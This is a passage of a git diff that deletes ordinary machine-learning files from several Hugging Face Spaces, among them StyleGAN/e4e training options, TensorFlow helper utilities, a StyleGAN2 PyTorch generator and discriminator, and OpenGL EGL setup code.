open(os.path.splitext(filename)[0] + ".pil", "wb") as fp: - fp.write(b"PILfont\n") - fp.write(f";;;;;;{self.ysize};\n".encode("ascii")) # HACK!!! - fp.write(b"DATA\n") - for id in range(256): - m = self.metrics[id] - if not m: - puti16(fp, [0] * 10) - else: - puti16(fp, m[0] + m[1] + m[2]) diff --git a/spaces/Datasculptor/StyleGAN-NADA/e4e/options/train_options.py b/spaces/Datasculptor/StyleGAN-NADA/e4e/options/train_options.py deleted file mode 100644 index 583ea1423fdc9a649cd7044d74d554bf0ac2bf51..0000000000000000000000000000000000000000 --- a/spaces/Datasculptor/StyleGAN-NADA/e4e/options/train_options.py +++ /dev/null @@ -1,84 +0,0 @@ -from argparse import ArgumentParser -from configs.paths_config import model_paths - - -class TrainOptions: - - def __init__(self): - self.parser = ArgumentParser() - self.initialize() - - def initialize(self): - self.parser.add_argument('--exp_dir', type=str, help='Path to experiment output directory') - self.parser.add_argument('--dataset_type', default='ffhq_encode', type=str, - help='Type of dataset/experiment to run') - self.parser.add_argument('--encoder_type', default='Encoder4Editing', type=str, help='Which encoder to use') - - self.parser.add_argument('--batch_size', default=4, type=int, help='Batch size for training') - self.parser.add_argument('--test_batch_size', default=2, type=int, help='Batch size for testing and inference') - self.parser.add_argument('--workers', default=4, type=int, help='Number of train dataloader workers') - self.parser.add_argument('--test_workers', default=2, type=int, - help='Number of test/inference dataloader workers') - - self.parser.add_argument('--learning_rate', default=0.0001, type=float, help='Optimizer learning rate') - self.parser.add_argument('--optim_name', default='ranger', type=str, help='Which optimizer to use') - self.parser.add_argument('--train_decoder', default=False, type=bool, help='Whether to train the decoder model') - self.parser.add_argument('--start_from_latent_avg', action='store_true', - help='Whether to add average latent vector to generate codes from encoder.') - self.parser.add_argument('--lpips_type', default='alex', type=str, help='LPIPS backbone') - - self.parser.add_argument('--lpips_lambda', default=0.8, type=float, help='LPIPS loss multiplier factor') - self.parser.add_argument('--id_lambda', default=0.1, type=float, help='ID loss multiplier factor') - self.parser.add_argument('--l2_lambda', default=1.0, type=float, help='L2 loss multiplier factor') - - self.parser.add_argument('--stylegan_weights', default=model_paths['stylegan_ffhq'], type=str, - help='Path to StyleGAN model weights') - self.parser.add_argument('--stylegan_size', default=1024, type=int, - help='size of pretrained StyleGAN Generator') - self.parser.add_argument('--checkpoint_path', default=None, type=str, help='Path to pSp model checkpoint') - - self.parser.add_argument('--max_steps', default=500000, type=int, help='Maximum number of training steps') - self.parser.add_argument('--image_interval', default=100, type=int, - help='Interval for logging train images during training') - self.parser.add_argument('--board_interval', default=50, type=int, - help='Interval for logging metrics to tensorboard') - self.parser.add_argument('--val_interval', default=1000, type=int, help='Validation interval') - self.parser.add_argument('--save_interval', default=None, type=int, help='Model checkpoint interval') - - # Discriminator flags - self.parser.add_argument('--w_discriminator_lambda', default=0, type=float, help='Dw loss multiplier') - self.parser.add_argument('--w_discriminator_lr', default=2e-5, type=float, help='Dw learning rate') - self.parser.add_argument("--r1", type=float, default=10, help="weight of the r1 regularization") - self.parser.add_argument("--d_reg_every", type=int, default=16, - help="interval for applying r1 regularization") - self.parser.add_argument('--use_w_pool', action='store_true', - help='Whether to store a latnet codes pool for the discriminator\'s training') - self.parser.add_argument("--w_pool_size", type=int, default=50, - help="W\'s pool size, depends on --use_w_pool") - - # e4e specific - self.parser.add_argument('--delta_norm', type=int, default=2, help="norm type of the deltas") - self.parser.add_argument('--delta_norm_lambda', type=float, default=2e-4, help="lambda for delta norm loss") - - # Progressive training - self.parser.add_argument('--progressive_steps', nargs='+', type=int, default=None, - help="The training steps of training new deltas. steps[i] starts the delta_i training") - self.parser.add_argument('--progressive_start', type=int, default=None, - help="The training step to start training the deltas, overrides progressive_steps") - self.parser.add_argument('--progressive_step_every', type=int, default=2_000, - help="Amount of training steps for each progressive step") - - # Save additional training info to enable future training continuation from produced checkpoints - self.parser.add_argument('--save_training_data', action='store_true', - help='Save intermediate training data to resume training from the checkpoint') - self.parser.add_argument('--sub_exp_dir', default=None, type=str, help='Name of sub experiment directory') - self.parser.add_argument('--keep_optimizer', action='store_true', - help='Whether to continue from the checkpoint\'s optimizer') - self.parser.add_argument('--resume_training_from_ckpt', default=None, type=str, - help='Path to training checkpoint, works when --save_training_data was set to True') - self.parser.add_argument('--update_param_list', nargs='+', type=str, default=None, - help="Name of training parameters to update the loaded training checkpoint") - - def parse(self): - opts = self.parser.parse_args() - return opts diff --git a/spaces/Devika/Briefly/README.md b/spaces/Devika/Briefly/README.md deleted file mode 100644 index eae276712932515b8895ed5b5212c364e7af2dcb..0000000000000000000000000000000000000000 --- a/spaces/Devika/Briefly/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: Briefly -emoji: 🎯 -colorFrom: gray -colorTo: yellow -sdk: streamlit -app_file: app.py -pinned: false ---- - -# Briefly -Read trending news in less than 60 words. diff --git a/spaces/Dinoking/Guccio-AI-Designer/models/stylegan/stylegan_tf/dnnlib/tflib/tfutil.py b/spaces/Dinoking/Guccio-AI-Designer/models/stylegan/stylegan_tf/dnnlib/tflib/tfutil.py deleted file mode 100644 index a431a4d4d18a32c9cd44a14ce89f35e038dc312c..0000000000000000000000000000000000000000 --- a/spaces/Dinoking/Guccio-AI-Designer/models/stylegan/stylegan_tf/dnnlib/tflib/tfutil.py +++ /dev/null @@ -1,240 +0,0 @@ -# Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. -# -# This work is licensed under the Creative Commons Attribution-NonCommercial -# 4.0 International License. To view a copy of this license, visit -# http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to -# Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. - -"""Miscellaneous helper utils for Tensorflow.""" - -import os -import numpy as np -import tensorflow as tf - -from typing import Any, Iterable, List, Union - -TfExpression = Union[tf.Tensor, tf.Variable, tf.Operation] -"""A type that represents a valid Tensorflow expression.""" - -TfExpressionEx = Union[TfExpression, int, float, np.ndarray] -"""A type that can be converted to a valid Tensorflow expression.""" - - -def run(*args, **kwargs) -> Any: - """Run the specified ops in the default session.""" - assert_tf_initialized() - return tf.get_default_session().run(*args, **kwargs) - - -def is_tf_expression(x: Any) -> bool: - """Check whether the input is a valid Tensorflow expression, i.e., Tensorflow Tensor, Variable, or Operation.""" - return isinstance(x, (tf.Tensor, tf.Variable, tf.Operation)) - - -def shape_to_list(shape: Iterable[tf.Dimension]) -> List[Union[int, None]]: - """Convert a Tensorflow shape to a list of ints.""" - return [dim.value for dim in shape] - - -def flatten(x: TfExpressionEx) -> TfExpression: - """Shortcut function for flattening a tensor.""" - with tf.name_scope("Flatten"): - return tf.reshape(x, [-1]) - - -def log2(x: TfExpressionEx) -> TfExpression: - """Logarithm in base 2.""" - with tf.name_scope("Log2"): - return tf.log(x) * np.float32(1.0 / np.log(2.0)) - - -def exp2(x: TfExpressionEx) -> TfExpression: - """Exponent in base 2.""" - with tf.name_scope("Exp2"): - return tf.exp(x * np.float32(np.log(2.0))) - - -def lerp(a: TfExpressionEx, b: TfExpressionEx, t: TfExpressionEx) -> TfExpressionEx: - """Linear interpolation.""" - with tf.name_scope("Lerp"): - return a + (b - a) * t - - -def lerp_clip(a: TfExpressionEx, b: TfExpressionEx, t: TfExpressionEx) -> TfExpression: - """Linear interpolation with clip.""" - with tf.name_scope("LerpClip"): - return a + (b - a) * tf.clip_by_value(t, 0.0, 1.0) - - -def absolute_name_scope(scope: str) -> tf.name_scope: - """Forcefully enter the specified name scope, ignoring any surrounding scopes.""" - return tf.name_scope(scope + "/") - - -def absolute_variable_scope(scope: str, **kwargs) -> tf.variable_scope: - """Forcefully enter the specified variable scope, ignoring any surrounding scopes.""" - return tf.variable_scope(tf.VariableScope(name=scope, **kwargs), auxiliary_name_scope=False) - - -def _sanitize_tf_config(config_dict: dict = None) -> dict: - # Defaults. - cfg = dict() - cfg["rnd.np_random_seed"] = None # Random seed for NumPy. None = keep as is. - cfg["rnd.tf_random_seed"] = "auto" # Random seed for TensorFlow. 'auto' = derive from NumPy random state. None = keep as is. - cfg["env.TF_CPP_MIN_LOG_LEVEL"] = "1" # 0 = Print all available debug info from TensorFlow. 1 = Print warnings and errors, but disable debug info. - cfg["graph_options.place_pruned_graph"] = True # False = Check that all ops are available on the designated device. True = Skip the check for ops that are not used. - cfg["gpu_options.allow_growth"] = True # False = Allocate all GPU memory at the beginning. True = Allocate only as much GPU memory as needed. - - # User overrides. - if config_dict is not None: - cfg.update(config_dict) - return cfg - - -def init_tf(config_dict: dict = None) -> None: - """Initialize TensorFlow session using good default settings.""" - # Skip if already initialized. - if tf.get_default_session() is not None: - return - - # Setup config dict and random seeds. - cfg = _sanitize_tf_config(config_dict) - np_random_seed = cfg["rnd.np_random_seed"] - if np_random_seed is not None: - np.random.seed(np_random_seed) - tf_random_seed = cfg["rnd.tf_random_seed"] - if tf_random_seed == "auto": - tf_random_seed = np.random.randint(1 << 31) - if tf_random_seed is not None: - tf.set_random_seed(tf_random_seed) - - # Setup environment variables. - for key, value in list(cfg.items()): - fields = key.split(".") - if fields[0] == "env": - assert len(fields) == 2 - os.environ[fields[1]] = str(value) - - # Create default TensorFlow session. - create_session(cfg, force_as_default=True) - - -def assert_tf_initialized(): - """Check that TensorFlow session has been initialized.""" - if tf.get_default_session() is None: - raise RuntimeError("No default TensorFlow session found. Please call dnnlib.tflib.init_tf().") - - -def create_session(config_dict: dict = None, force_as_default: bool = False) -> tf.Session: - """Create tf.Session based on config dict.""" - # Setup TensorFlow config proto. - cfg = _sanitize_tf_config(config_dict) - config_proto = tf.ConfigProto() - for key, value in cfg.items(): - fields = key.split(".") - if fields[0] not in ["rnd", "env"]: - obj = config_proto - for field in fields[:-1]: - obj = getattr(obj, field) - setattr(obj, fields[-1], value) - - # Create session. - session = tf.Session(config=config_proto) - if force_as_default: - # pylint: disable=protected-access - session._default_session = session.as_default() - session._default_session.enforce_nesting = False - session._default_session.__enter__() # pylint: disable=no-member - - return session - - -def init_uninitialized_vars(target_vars: List[tf.Variable] = None) -> None: - """Initialize all tf.Variables that have not already been initialized. - - Equivalent to the following, but more efficient and does not bloat the tf graph: - tf.variables_initializer(tf.report_uninitialized_variables()).run() - """ - assert_tf_initialized() - if target_vars is None: - target_vars = tf.global_variables() - - test_vars = [] - test_ops = [] - - with tf.control_dependencies(None): # ignore surrounding control_dependencies - for var in target_vars: - assert is_tf_expression(var) - - try: - tf.get_default_graph().get_tensor_by_name(var.name.replace(":0", "/IsVariableInitialized:0")) - except KeyError: - # Op does not exist => variable may be uninitialized. - test_vars.append(var) - - with absolute_name_scope(var.name.split(":")[0]): - test_ops.append(tf.is_variable_initialized(var)) - - init_vars = [var for var, inited in zip(test_vars, run(test_ops)) if not inited] - run([var.initializer for var in init_vars]) - - -def set_vars(var_to_value_dict: dict) -> None: - """Set the values of given tf.Variables. - - Equivalent to the following, but more efficient and does not bloat the tf graph: - tflib.run([tf.assign(var, value) for var, value in var_to_value_dict.items()] - """ - assert_tf_initialized() - ops = [] - feed_dict = {} - - for var, value in var_to_value_dict.items(): - assert is_tf_expression(var) - - try: - setter = tf.get_default_graph().get_tensor_by_name(var.name.replace(":0", "/setter:0")) # look for existing op - except KeyError: - with absolute_name_scope(var.name.split(":")[0]): - with tf.control_dependencies(None): # ignore surrounding control_dependencies - setter = tf.assign(var, tf.placeholder(var.dtype, var.shape, "new_value"), name="setter") # create new setter - - ops.append(setter) - feed_dict[setter.op.inputs[1]] = value - - run(ops, feed_dict) - - -def create_var_with_large_initial_value(initial_value: np.ndarray, *args, **kwargs): - """Create tf.Variable with large initial value without bloating the tf graph.""" - assert_tf_initialized() - assert isinstance(initial_value, np.ndarray) - zeros = tf.zeros(initial_value.shape, initial_value.dtype) - var = tf.Variable(zeros, *args, **kwargs) - set_vars({var: initial_value}) - return var - - -def convert_images_from_uint8(images, drange=[-1,1], nhwc_to_nchw=False): - """Convert a minibatch of images from uint8 to float32 with configurable dynamic range. - Can be used as an input transformation for Network.run(). - """ - images = tf.cast(images, tf.float32) - if nhwc_to_nchw: - images = tf.transpose(images, [0, 3, 1, 2]) - return (images - drange[0]) * ((drange[1] - drange[0]) / 255) - - -def convert_images_to_uint8(images, drange=[-1,1], nchw_to_nhwc=False, shrink=1): - """Convert a minibatch of images from float32 to uint8 with configurable dynamic range. - Can be used as an output transformation for Network.run(). - """ - images = tf.cast(images, tf.float32) - if shrink > 1: - ksize = [1, 1, shrink, shrink] - images = tf.nn.avg_pool(images, ksize=ksize, strides=ksize, padding="VALID", data_format="NCHW") - if nchw_to_nhwc: - images = tf.transpose(images, [0, 2, 3, 1]) - scale = 255 / (drange[1] - drange[0]) - images = images * scale + (0.5 - drange[0] * scale) - return tf.saturate_cast(images, tf.uint8) diff --git a/spaces/Dinoking/Guccio-AI-Designer/models/stylegan2/stylegan2-pytorch/model.py b/spaces/Dinoking/Guccio-AI-Designer/models/stylegan2/stylegan2-pytorch/model.py deleted file mode 100644 index 4e3c9687a3f4f7301cf053bee95c1e288b1c939b..0000000000000000000000000000000000000000 --- a/spaces/Dinoking/Guccio-AI-Designer/models/stylegan2/stylegan2-pytorch/model.py +++ /dev/null @@ -1,703 +0,0 @@ -import math -import random -import functools -import operator - -import torch -from torch import nn -from torch.nn import functional as F -from torch.autograd import Function - -from op import FusedLeakyReLU, fused_leaky_relu, upfirdn2d - - -class PixelNorm(nn.Module): - def __init__(self): - super().__init__() - - def forward(self, input): - return input * torch.rsqrt(torch.mean(input ** 2, dim=1, keepdim=True) + 1e-8) - - -def make_kernel(k): - k = torch.tensor(k, dtype=torch.float32) - - if k.ndim == 1: - k = k[None, :] * k[:, None] - - k /= k.sum() - - return k - - -class Upsample(nn.Module): - def __init__(self, kernel, factor=2): - super().__init__() - - self.factor = factor - kernel = make_kernel(kernel) * (factor ** 2) - self.register_buffer('kernel', kernel) - - p = kernel.shape[0] - factor - - pad0 = (p + 1) // 2 + factor - 1 - pad1 = p // 2 - - self.pad = (pad0, pad1) - - def forward(self, input): - out = upfirdn2d(input, self.kernel, up=self.factor, down=1, pad=self.pad) - - return out - - -class Downsample(nn.Module): - def __init__(self, kernel, factor=2): - super().__init__() - - self.factor = factor - kernel = make_kernel(kernel) - self.register_buffer('kernel', kernel) - - p = kernel.shape[0] - factor - - pad0 = (p + 1) // 2 - pad1 = p // 2 - - self.pad = (pad0, pad1) - - def forward(self, input): - out = upfirdn2d(input, self.kernel, up=1, down=self.factor, pad=self.pad) - - return out - - -class Blur(nn.Module): - def __init__(self, kernel, pad, upsample_factor=1): - super().__init__() - - kernel = make_kernel(kernel) - - if upsample_factor > 1: - kernel = kernel * (upsample_factor ** 2) - - self.register_buffer('kernel', kernel) - - self.pad = pad - - def forward(self, input): - out = upfirdn2d(input, self.kernel, pad=self.pad) - - return out - - -class EqualConv2d(nn.Module): - def __init__( - self, in_channel, out_channel, kernel_size, stride=1, padding=0, bias=True - ): - super().__init__() - - self.weight = nn.Parameter( - torch.randn(out_channel, in_channel, kernel_size, kernel_size) - ) - self.scale = 1 / math.sqrt(in_channel * kernel_size ** 2) - - self.stride = stride - self.padding = padding - - if bias: - self.bias = nn.Parameter(torch.zeros(out_channel)) - - else: - self.bias = None - - def forward(self, input): - out = F.conv2d( - input, - self.weight * self.scale, - bias=self.bias, - stride=self.stride, - padding=self.padding, - ) - - return out - - def __repr__(self): - return ( - f'{self.__class__.__name__}({self.weight.shape[1]}, {self.weight.shape[0]},' - f' {self.weight.shape[2]}, stride={self.stride}, padding={self.padding})' - ) - - -class EqualLinear(nn.Module): - def __init__( - self, in_dim, out_dim, bias=True, bias_init=0, lr_mul=1, activation=None - ): - super().__init__() - - self.weight = nn.Parameter(torch.randn(out_dim, in_dim).div_(lr_mul)) - - if bias: - self.bias = nn.Parameter(torch.zeros(out_dim).fill_(bias_init)) - - else: - self.bias = None - - self.activation = activation - - self.scale = (1 / math.sqrt(in_dim)) * lr_mul - self.lr_mul = lr_mul - - def forward(self, input): - if self.activation: - out = F.linear(input, self.weight * self.scale) - out = fused_leaky_relu(out, self.bias * self.lr_mul) - - else: - out = F.linear( - input, self.weight * self.scale, bias=self.bias * self.lr_mul - ) - - return out - - def __repr__(self): - return ( - f'{self.__class__.__name__}({self.weight.shape[1]}, {self.weight.shape[0]})' - ) - - -class ScaledLeakyReLU(nn.Module): - def __init__(self, negative_slope=0.2): - super().__init__() - - self.negative_slope = negative_slope - - def forward(self, input): - out = F.leaky_relu(input, negative_slope=self.negative_slope) - - return out * math.sqrt(2) - - -class ModulatedConv2d(nn.Module): - def __init__( - self, - in_channel, - out_channel, - kernel_size, - style_dim, - demodulate=True, - upsample=False, - downsample=False, - blur_kernel=[1, 3, 3, 1], - ): - super().__init__() - - self.eps = 1e-8 - self.kernel_size = kernel_size - self.in_channel = in_channel - self.out_channel = out_channel - self.upsample = upsample - self.downsample = downsample - - if upsample: - factor = 2 - p = (len(blur_kernel) - factor) - (kernel_size - 1) - pad0 = (p + 1) // 2 + factor - 1 - pad1 = p // 2 + 1 - - self.blur = Blur(blur_kernel, pad=(pad0, pad1), upsample_factor=factor) - - if downsample: - factor = 2 - p = (len(blur_kernel) - factor) + (kernel_size - 1) - pad0 = (p + 1) // 2 - pad1 = p // 2 - - self.blur = Blur(blur_kernel, pad=(pad0, pad1)) - - fan_in = in_channel * kernel_size ** 2 - self.scale = 1 / math.sqrt(fan_in) - self.padding = kernel_size // 2 - - self.weight = nn.Parameter( - torch.randn(1, out_channel, in_channel, kernel_size, kernel_size) - ) - - self.modulation = EqualLinear(style_dim, in_channel, bias_init=1) - - self.demodulate = demodulate - - def __repr__(self): - return ( - f'{self.__class__.__name__}({self.in_channel}, {self.out_channel}, {self.kernel_size}, ' - f'upsample={self.upsample}, downsample={self.downsample})' - ) - - def forward(self, input, style): - batch, in_channel, height, width = input.shape - - style = self.modulation(style).view(batch, 1, in_channel, 1, 1) - weight = self.scale * self.weight * style - - if self.demodulate: - demod = torch.rsqrt(weight.pow(2).sum([2, 3, 4]) + 1e-8) - weight = weight * demod.view(batch, self.out_channel, 1, 1, 1) - - weight = weight.view( - batch * self.out_channel, in_channel, self.kernel_size, self.kernel_size - ) - - if self.upsample: - input = input.view(1, batch * in_channel, height, width) - weight = weight.view( - batch, self.out_channel, in_channel, self.kernel_size, self.kernel_size - ) - weight = weight.transpose(1, 2).reshape( - batch * in_channel, self.out_channel, self.kernel_size, self.kernel_size - ) - out = F.conv_transpose2d(input, weight, padding=0, stride=2, groups=batch) - _, _, height, width = out.shape - out = out.view(batch, self.out_channel, height, width) - out = self.blur(out) - - elif self.downsample: - input = self.blur(input) - _, _, height, width = input.shape - input = input.view(1, batch * in_channel, height, width) - out = F.conv2d(input, weight, padding=0, stride=2, groups=batch) - _, _, height, width = out.shape - out = out.view(batch, self.out_channel, height, width) - - else: - input = input.view(1, batch * in_channel, height, width) - out = F.conv2d(input, weight, padding=self.padding, groups=batch) - _, _, height, width = out.shape - out = out.view(batch, self.out_channel, height, width) - - return out - - -class NoiseInjection(nn.Module): - def __init__(self): - super().__init__() - - self.weight = nn.Parameter(torch.zeros(1)) - - def forward(self, image, noise=None): - if noise is None: - batch, _, height, width = image.shape - noise = image.new_empty(batch, 1, height, width).normal_() - - return image + self.weight * noise - - -class ConstantInput(nn.Module): - def __init__(self, channel, size=4): - super().__init__() - - self.input = nn.Parameter(torch.randn(1, channel, size, size)) - - def forward(self, input): - batch = input.shape[0] - out = self.input.repeat(batch, 1, 1, 1) - - return out - - -class StyledConv(nn.Module): - def __init__( - self, - in_channel, - out_channel, - kernel_size, - style_dim, - upsample=False, - blur_kernel=[1, 3, 3, 1], - demodulate=True, - ): - super().__init__() - - self.conv = ModulatedConv2d( - in_channel, - out_channel, - kernel_size, - style_dim, - upsample=upsample, - blur_kernel=blur_kernel, - demodulate=demodulate, - ) - - self.noise = NoiseInjection() - # self.bias = nn.Parameter(torch.zeros(1, out_channel, 1, 1)) - # self.activate = ScaledLeakyReLU(0.2) - self.activate = FusedLeakyReLU(out_channel) - - def forward(self, input, style, noise=None): - out = self.conv(input, style) - out = self.noise(out, noise=noise) - # out = out + self.bias - out = self.activate(out) - - return out - - -class ToRGB(nn.Module): - def __init__(self, in_channel, style_dim, upsample=True, blur_kernel=[1, 3, 3, 1]): - super().__init__() - - if upsample: - self.upsample = Upsample(blur_kernel) - - self.conv = ModulatedConv2d(in_channel, 3, 1, style_dim, demodulate=False) - self.bias = nn.Parameter(torch.zeros(1, 3, 1, 1)) - - def forward(self, input, style, skip=None): - out = self.conv(input, style) - out = out + self.bias - - if skip is not None: - skip = self.upsample(skip) - - out = out + skip - - return out - -# Wrapper that gives name to tensor -class NamedTensor(nn.Module): - def __init__(self): - super().__init__() - - def forward(self, x): - return x - -# Give each style a unique name -class StridedStyle(nn.ModuleList): - def __init__(self, n_latents): - super().__init__([NamedTensor() for _ in range(n_latents)]) - self.n_latents = n_latents - - def forward(self, x): - # x already strided - styles = [self[i](x[:, i, :]) for i in range(self.n_latents)] - return torch.stack(styles, dim=1) - -class Generator(nn.Module): - def __init__( - self, - size, - style_dim, - n_mlp, - channel_multiplier=2, - blur_kernel=[1, 3, 3, 1], - lr_mlp=0.01, - ): - super().__init__() - - self.size = size - - self.style_dim = style_dim - - layers = [PixelNorm()] - - for i in range(n_mlp): - layers.append( - EqualLinear( - style_dim, style_dim, lr_mul=lr_mlp, activation='fused_lrelu' - ) - ) - - self.style = nn.Sequential(*layers) - - self.channels = { - 4: 512, - 8: 512, - 16: 512, - 32: 512, - 64: 256 * channel_multiplier, - 128: 128 * channel_multiplier, - 256: 64 * channel_multiplier, - 512: 32 * channel_multiplier, - 1024: 16 * channel_multiplier, - } - - self.input = ConstantInput(self.channels[4]) - self.conv1 = StyledConv( - self.channels[4], self.channels[4], 3, style_dim, blur_kernel=blur_kernel - ) - self.to_rgb1 = ToRGB(self.channels[4], style_dim, upsample=False) - - self.log_size = int(math.log(size, 2)) - self.num_layers = (self.log_size - 2) * 2 + 1 - - self.convs = nn.ModuleList() - self.upsamples = nn.ModuleList() - self.to_rgbs = nn.ModuleList() - self.noises = nn.Module() - - in_channel = self.channels[4] - - for layer_idx in range(self.num_layers): - res = (layer_idx + 5) // 2 - shape = [1, 1, 2 ** res, 2 ** res] - self.noises.register_buffer(f'noise_{layer_idx}', torch.randn(*shape)) - - for i in range(3, self.log_size + 1): - out_channel = self.channels[2 ** i] - - self.convs.append( - StyledConv( - in_channel, - out_channel, - 3, - style_dim, - upsample=True, - blur_kernel=blur_kernel, - ) - ) - - self.convs.append( - StyledConv( - out_channel, out_channel, 3, style_dim, blur_kernel=blur_kernel - ) - ) - - self.to_rgbs.append(ToRGB(out_channel, style_dim)) - - in_channel = out_channel - - self.n_latent = self.log_size * 2 - 2 - self.strided_style = StridedStyle(self.n_latent) - - def make_noise(self): - device = self.input.input.device - - noises = [torch.randn(1, 1, 2 ** 2, 2 ** 2, device=device)] - - for i in range(3, self.log_size + 1): - for _ in range(2): - noises.append(torch.randn(1, 1, 2 ** i, 2 ** i, device=device)) - - return noises - - def mean_latent(self, n_latent): - latent_in = torch.randn( - n_latent, self.style_dim, device=self.input.input.device - ) - latent = self.style(latent_in).mean(0, keepdim=True) - - return latent - - def get_latent(self, input): - return self.style(input) - - def forward( - self, - styles, - return_latents=False, - inject_index=None, - truncation=1, - truncation_latent=None, - input_is_w=False, - noise=None, - randomize_noise=True, - ): - if not input_is_w: - styles = [self.style(s) for s in styles] - - if noise is None: - if randomize_noise: - noise = [None] * self.num_layers - else: - noise = [ - getattr(self.noises, f'noise_{i}') for i in range(self.num_layers) - ] - - if truncation < 1: - style_t = [] - - for style in styles: - style_t.append( - truncation_latent + truncation * (style - truncation_latent) - ) - - styles = style_t - - if len(styles) == 1: - # One global latent - inject_index = self.n_latent - - if styles[0].ndim < 3: - latent = styles[0].unsqueeze(1).repeat(1, inject_index, 1) - - else: - latent = styles[0] - - elif len(styles) == 2: - # Latent mixing with two latents - if inject_index is None: - inject_index = random.randint(1, self.n_latent - 1) - - latent = styles[0].unsqueeze(1).repeat(1, inject_index, 1) - latent2 = styles[1].unsqueeze(1).repeat(1, self.n_latent - inject_index, 1) - - latent = self.strided_style(torch.cat([latent, latent2], 1)) - else: - # One latent per layer - assert len(styles) == self.n_latent, f'Expected {self.n_latents} latents, got {len(styles)}' - styles = torch.stack(styles, dim=1) # [N, 18, 512] - latent = self.strided_style(styles) - - out = self.input(latent) - out = self.conv1(out, latent[:, 0], noise=noise[0]) - - skip = self.to_rgb1(out, latent[:, 1]) - - i = 1 - for conv1, conv2, noise1, noise2, to_rgb in zip( - self.convs[::2], self.convs[1::2], noise[1::2], noise[2::2], self.to_rgbs - ): - out = conv1(out, latent[:, i], noise=noise1) - out = conv2(out, latent[:, i + 1], noise=noise2) - skip = to_rgb(out, latent[:, i + 2], skip) - - i += 2 - - image = skip - - if return_latents: - return image, latent - - else: - return image, None - - -class ConvLayer(nn.Sequential): - def __init__( - self, - in_channel, - out_channel, - kernel_size, - downsample=False, - blur_kernel=[1, 3, 3, 1], - bias=True, - activate=True, - ): - layers = [] - - if downsample: - factor = 2 - p = (len(blur_kernel) - factor) + (kernel_size - 1) - pad0 = (p + 1) // 2 - pad1 = p // 2 - - layers.append(Blur(blur_kernel, pad=(pad0, pad1))) - - stride = 2 - self.padding = 0 - - else: - stride = 1 - self.padding = kernel_size // 2 - - layers.append( - EqualConv2d( - in_channel, - out_channel, - kernel_size, - padding=self.padding, - stride=stride, - bias=bias and not activate, - ) - ) - - if activate: - if bias: - layers.append(FusedLeakyReLU(out_channel)) - - else: - layers.append(ScaledLeakyReLU(0.2)) - - super().__init__(*layers) - - -class ResBlock(nn.Module): - def __init__(self, in_channel, out_channel, blur_kernel=[1, 3, 3, 1]): - super().__init__() - - self.conv1 = ConvLayer(in_channel, in_channel, 3) - self.conv2 = ConvLayer(in_channel, out_channel, 3, downsample=True) - - self.skip = ConvLayer( - in_channel, out_channel, 1, downsample=True, activate=False, bias=False - ) - - def forward(self, input): - out = self.conv1(input) - out = self.conv2(out) - - skip = self.skip(input) - out = (out + skip) / math.sqrt(2) - - return out - - -class Discriminator(nn.Module): - def __init__(self, size, channel_multiplier=2, blur_kernel=[1, 3, 3, 1]): - super().__init__() - - channels = { - 4: 512, - 8: 512, - 16: 512, - 32: 512, - 64: 256 * channel_multiplier, - 128: 128 * channel_multiplier, - 256: 64 * channel_multiplier, - 512: 32 * channel_multiplier, - 1024: 16 * channel_multiplier, - } - - convs = [ConvLayer(3, channels[size], 1)] - - log_size = int(math.log(size, 2)) - - in_channel = channels[size] - - for i in range(log_size, 2, -1): - out_channel = channels[2 ** (i - 1)] - - convs.append(ResBlock(in_channel, out_channel, blur_kernel)) - - in_channel = out_channel - - self.convs = nn.Sequential(*convs) - - self.stddev_group = 4 - self.stddev_feat = 1 - - self.final_conv = ConvLayer(in_channel + 1, channels[4], 3) - self.final_linear = nn.Sequential( - EqualLinear(channels[4] * 4 * 4, channels[4], activation='fused_lrelu'), - EqualLinear(channels[4], 1), - ) - - def forward(self, input): - out = self.convs(input) - - batch, channel, height, width = out.shape - group = min(batch, self.stddev_group) - stddev = out.view( - group, -1, self.stddev_feat, channel // self.stddev_feat, height, width - ) - stddev = torch.sqrt(stddev.var(0, unbiased=False) + 1e-8) - stddev = stddev.mean([2, 3, 4], keepdims=True).squeeze(2) - stddev = stddev.repeat(group, 1, height, width) - out = torch.cat([out, stddev], 1) - - out = self.final_conv(out) - - out = out.view(batch, -1) - out = self.final_linear(out) - - return out - diff --git a/spaces/DragGan/DragGan-Inversion/gui_utils/gl_utils.py b/spaces/DragGan/DragGan-Inversion/gui_utils/gl_utils.py deleted file mode 100644 index 922db6ff7c8643352334c36b83039b8d2dad8a0f..0000000000000000000000000000000000000000 --- a/spaces/DragGan/DragGan-Inversion/gui_utils/gl_utils.py +++ /dev/null @@ -1,455 +0,0 @@ -# Copyright (c) 2021, NVIDIA CORPORATION & AFFILIATES. All rights reserved. -# -# NVIDIA CORPORATION and its licensors retain all intellectual property -# and proprietary rights in and to this software, related documentation -# and any modifications thereto. Any use, reproduction, disclosure or -# distribution of this software and related documentation without an express -# license agreement from NVIDIA CORPORATION is strictly prohibited. - -import math -import os -import functools -import contextlib -import numpy as np -import OpenGL.GL as gl -import OpenGL.GL.ARB.texture_float -import dnnlib - -# ---------------------------------------------------------------------------- - - -def init_egl(): - # Must be set before importing OpenGL. - assert os.environ['PYOPENGL_PLATFORM'] == 'egl' - import OpenGL.EGL as egl - import ctypes - - # Initialize EGL. - display = egl.eglGetDisplay(egl.EGL_DEFAULT_DISPLAY) - assert display != egl.EGL_NO_DISPLAY - major = ctypes.c_int32() - minor = ctypes.c_int32() - ok = egl.eglInitialize(display, major, minor) - assert ok - assert major.value * 10 + minor.value >= 14 - - # Choose config. - config_attribs = [ - egl.EGL_RENDERABLE_TYPE, egl.EGL_OPENGL_BIT, - egl.EGL_SURFACE_TYPE, egl.EGL_PBUFFER_BIT, - egl.EGL_NONE - ] - configs = (ctypes.c_int32 * 1)() - num_configs = ctypes.c_int32() - ok = egl.eglChooseConfig(display, config_attribs, configs, 1, num_configs) - assert ok - assert num_configs.value == 1 - config = configs[0] - - # Create dummy pbuffer surface. - surface_attribs = [ - egl.EGL_WIDTH, 1, - egl.EGL_HEIGHT, 1, - egl.EGL_NONE - ] - surface = egl.eglCreatePbufferSurface(display, config, surface_attribs) - assert surface != egl.EGL_NO_SURFACE - - # Setup GL context. - ok = egl.eglBindAPI(egl.EGL_OPENGL_API) - assert ok - context = egl.eglCreateContext(display, config, egl.EGL_NO_CONTEXT, None) - assert context != egl.EGL_NO_CONTEXT - ok = egl.eglMakeCurrent(display, surface, surface, context) - assert ok - -# 